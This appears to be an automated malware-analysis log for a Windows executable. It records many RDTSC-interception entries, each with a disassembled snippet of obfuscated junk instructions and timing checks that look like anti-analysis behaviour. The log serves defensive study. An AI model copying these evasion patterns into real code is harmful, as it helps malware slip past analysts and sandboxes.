Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50903B7 second address: 5090469 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or edx, dword ptr [ebp+0Ch] 0x0000000c jmp 00007F5BC10A35FEh 0x00000011 test edx, 61000000h 0x00000017 pushad 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F5BC10A35FCh 0x0000001f xor ax, 3BE8h 0x00000024 jmp 00007F5BC10A35FBh 0x00000029 popfd 0x0000002a pushfd 0x0000002b jmp 00007F5BC10A3608h 0x00000030 xor ch, 00000048h 0x00000033 jmp 00007F5BC10A35FBh 0x00000038 popfd 0x00000039 popad 0x0000003a jmp 00007F5BC10A3608h 0x0000003f popad 0x00000040 jne 00007F5C32F41839h 0x00000046 pushad 0x00000047 mov ebx, eax 0x00000049 call 00007F5BC10A35FAh 0x0000004e mov ecx, 2AA2D331h 0x00000053 pop ecx 0x00000054 popad 0x00000055 test byte ptr [esi+48h], 00000001h 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5090469 second address: 509046D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 509046D second address: 5090483 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3602h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50807F3 second address: 508081C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5BC10B70A5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 508081C second address: 5080864 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F5BC10A35FEh 0x0000000f push eax 0x00000010 jmp 00007F5BC10A35FBh 0x00000015 xchg eax, ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F5BC10A3605h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5080864 second address: 5080885 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B70A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ebx, 2CCD668Eh 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5080885 second address: 50808BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov bx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F5BC10A3603h 0x00000011 xchg eax, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5BC10A3605h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50808BC second address: 5080976 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B70A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d mov ax, 9C03h 0x00000011 mov ebx, ecx 0x00000013 popad 0x00000014 sub ebx, ebx 0x00000016 pushad 0x00000017 call 00007F5BC10B70A1h 0x0000001c call 00007F5BC10B70A0h 0x00000021 pop esi 0x00000022 pop edx 0x00000023 movzx ecx, di 0x00000026 popad 0x00000027 test esi, esi 0x00000029 jmp 00007F5BC10B70A3h 0x0000002e je 00007F5C32F5CB09h 0x00000034 pushad 0x00000035 mov edx, ecx 0x00000037 mov di, si 0x0000003a popad 0x0000003b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000042 pushad 0x00000043 mov eax, 6C15080Fh 0x00000048 pushfd 0x00000049 jmp 00007F5BC10B70A4h 0x0000004e or esi, 68FBD5B8h 0x00000054 jmp 00007F5BC10B709Bh 0x00000059 popfd 0x0000005a popad 0x0000005b mov ecx, esi 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007F5BC10B70A5h 0x00000064 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5080976 second address: 508097C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 508097C second address: 5080980 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5080980 second address: 50809CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F5C32F49011h 0x0000000e pushad 0x0000000f mov bx, 2F48h 0x00000013 pushfd 0x00000014 jmp 00007F5BC10A3601h 0x00000019 sub ax, 01B6h 0x0000001e jmp 00007F5BC10A3601h 0x00000023 popfd 0x00000024 popad 0x00000025 test byte ptr [76FB6968h], 00000002h 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50809CA second address: 50809DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50809DD second address: 50809E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50809E3 second address: 5080A1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F5C32F5CA61h 0x0000000e jmp 00007F5BC10B70A7h 0x00000013 mov edx, dword ptr [ebp+0Ch] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F5BC10B70A0h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5080A1F second address: 5080A23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5080A23 second address: 5080A29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5080A29 second address: 5080A2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5080A2F second address: 5080A8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B70A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d mov ecx, 47B5C90Dh 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 mov edi, ecx 0x00000017 mov ax, 7B27h 0x0000001b popad 0x0000001c xchg eax, ebx 0x0000001d jmp 00007F5BC10B709Ah 0x00000022 xchg eax, ebx 0x00000023 jmp 00007F5BC10B70A0h 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F5BC10B709Eh 0x00000030 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5080A8B second address: 5080A91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5080A91 second address: 5080A95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5080A95 second address: 5080A99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5080AF4 second address: 5080AF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5080AF8 second address: 5080AFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5080AFC second address: 5080B02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5080B02 second address: 5080B08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5080B08 second address: 5080B23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5080B23 second address: 5080B27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5080B27 second address: 5080B2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5080B2D second address: 5080B5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov esp, ebp 0x0000000c jmp 00007F5BC10A35FCh 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5BC10A3607h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5090E0F second address: 5090E69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F5BC10B70A1h 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007F5BC10B70A1h 0x0000000f and eax, 6C1D6216h 0x00000015 jmp 00007F5BC10B70A1h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov ebp, esp 0x00000020 pushad 0x00000021 movzx eax, dx 0x00000024 push eax 0x00000025 push edx 0x00000026 call 00007F5BC10B709Fh 0x0000002b pop ecx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5090E69 second address: 5090E6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5090E6D second address: 5090EC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F5BC10B709Eh 0x00000011 adc si, D098h 0x00000016 jmp 00007F5BC10B709Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F5BC10B70A8h 0x00000022 or ax, 7AF8h 0x00000027 jmp 00007F5BC10B709Bh 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5090BF7 second address: 5090C09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BC10A35FEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5090C09 second address: 5090C4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F5BC10B70A6h 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F5BC10B70A7h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5090C4C second address: 5090C64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BC10A3604h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 51107B4 second address: 51107BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 51107BA second address: 51107D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3602h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 51007E7 second address: 5100874 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5BC10B70A0h 0x00000009 xor ax, 0778h 0x0000000e jmp 00007F5BC10B709Bh 0x00000013 popfd 0x00000014 mov bx, cx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c mov dx, cx 0x0000001f mov ebx, eax 0x00000021 popad 0x00000022 push eax 0x00000023 pushad 0x00000024 jmp 00007F5BC10B709Fh 0x00000029 push ecx 0x0000002a push edi 0x0000002b pop esi 0x0000002c pop edi 0x0000002d popad 0x0000002e xchg eax, ebp 0x0000002f pushad 0x00000030 jmp 00007F5BC10B709Ch 0x00000035 movzx eax, dx 0x00000038 popad 0x00000039 mov ebp, esp 0x0000003b pushad 0x0000003c mov dh, 71h 0x0000003e pushad 0x0000003f call 00007F5BC10B70A2h 0x00000044 pop esi 0x00000045 mov ax, dx 0x00000048 popad 0x00000049 popad 0x0000004a pop ebp 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F5BC10B709Fh 0x00000054 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5100874 second address: 5100891 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3609h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5100C06 second address: 5100C0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5100C0A second address: 5100C10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5100C10 second address: 5100C76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, cx 0x00000006 mov ebx, ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F5BC10B70A3h 0x00000011 xchg eax, ebp 0x00000012 jmp 00007F5BC10B70A6h 0x00000017 mov ebp, esp 0x00000019 pushad 0x0000001a mov ax, 78CDh 0x0000001e pushfd 0x0000001f jmp 00007F5BC10B709Ah 0x00000024 jmp 00007F5BC10B70A5h 0x00000029 popfd 0x0000002a popad 0x0000002b push dword ptr [ebp+0Ch] 0x0000002e pushad 0x0000002f push esi 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5100C76 second address: 5100C9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov edx, eax 0x00000007 popad 0x00000008 push dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c push ecx 0x0000000d mov dl, D8h 0x0000000f pop ecx 0x00000010 movsx edx, ax 0x00000013 popad 0x00000014 push EBF1B5B1h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F5BC10A35FAh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5100C9B second address: 5100CA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5100CA1 second address: 5100CA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5100CA5 second address: 5100CA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5100CA9 second address: 5100CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 140F4A51h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5100CBE second address: 5100CC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5100CC4 second address: 5100CCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5100CEC second address: 5100CF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5100CF0 second address: 5100D0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3607h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5100D0B second address: 5100D23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BC10B70A4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0573 second address: 50B0598 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F5BC10A3601h 0x00000008 pop eax 0x00000009 mov bh, A6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov bx, si 0x00000013 push eax 0x00000014 push edx 0x00000015 mov si, 43A7h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0598 second address: 50B0617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007F5BC10B709Fh 0x0000000f sbb ecx, 62E64EEEh 0x00000015 jmp 00007F5BC10B70A9h 0x0000001a popfd 0x0000001b call 00007F5BC10B70A0h 0x00000020 pushad 0x00000021 popad 0x00000022 pop ecx 0x00000023 popad 0x00000024 xchg eax, ebp 0x00000025 jmp 00007F5BC10B70A7h 0x0000002a mov ebp, esp 0x0000002c pushad 0x0000002d jmp 00007F5BC10B70A4h 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0617 second address: 50B06AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push FFFFFFFEh 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop esi 0x0000000b mov ecx, edi 0x0000000d popad 0x0000000e push 3CB6DE44h 0x00000013 jmp 00007F5BC10A35FAh 0x00000018 add dword ptr [esp], 3A42E1D4h 0x0000001f jmp 00007F5BC10A3600h 0x00000024 push 52A31B2Bh 0x00000029 jmp 00007F5BC10A3601h 0x0000002e xor dword ptr [esp], 2453B52Bh 0x00000035 pushad 0x00000036 mov ecx, 4A3D7693h 0x0000003b mov cx, E8EFh 0x0000003f popad 0x00000040 mov eax, dword ptr fs:[00000000h] 0x00000046 pushad 0x00000047 pushfd 0x00000048 jmp 00007F5BC10A3600h 0x0000004d adc esi, 04558318h 0x00000053 jmp 00007F5BC10A35FBh 0x00000058 popfd 0x00000059 mov dl, ah 0x0000005b popad 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007F5BC10A35FAh 0x00000066 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B06AF second address: 50B06B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B06B3 second address: 50B06B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B06B9 second address: 50B0708 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 6E53h 0x00000007 pushfd 0x00000008 jmp 00007F5BC10B70A8h 0x0000000d sbb ecx, 405007D8h 0x00000013 jmp 00007F5BC10B709Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov dword ptr [esp], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F5BC10B70A5h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0708 second address: 50B073C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 1Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F5BC10A3608h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B073C second address: 50B0740 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0740 second address: 50B0746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0746 second address: 50B0772 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F5BC10B70A0h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov si, A1C3h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0772 second address: 50B07E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3605h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b call 00007F5BC10A35FCh 0x00000010 pushfd 0x00000011 jmp 00007F5BC10A3602h 0x00000016 xor si, 22E8h 0x0000001b jmp 00007F5BC10A35FBh 0x00000020 popfd 0x00000021 pop esi 0x00000022 mov dh, F3h 0x00000024 popad 0x00000025 xchg eax, esi 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 pushfd 0x0000002a jmp 00007F5BC10A35FCh 0x0000002f sbb ax, 3548h 0x00000034 jmp 00007F5BC10A35FBh 0x00000039 popfd 0x0000003a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B07E3 second address: 50B082F instructions: 0x00000000 rdtsc 0x00000002 mov edx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F5BC10B70A9h 0x00000013 jmp 00007F5BC10B709Bh 0x00000018 popfd 0x00000019 jmp 00007F5BC10B70A8h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B082F second address: 50B088C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A35FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F5BC10A3606h 0x0000000f xchg eax, edi 0x00000010 jmp 00007F5BC10A3600h 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F5BC10A35FCh 0x0000001f add ecx, 67D109F8h 0x00000025 jmp 00007F5BC10A35FBh 0x0000002a popfd 0x0000002b mov ebx, ecx 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B088C second address: 50B08A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BC10B70A0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B08A0 second address: 50B08D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 jmp 00007F5BC10A3607h 0x0000000e mov eax, dword ptr [76FBB370h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F5BC10A3600h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B08D9 second address: 50B08DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B08DF second address: 50B08E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
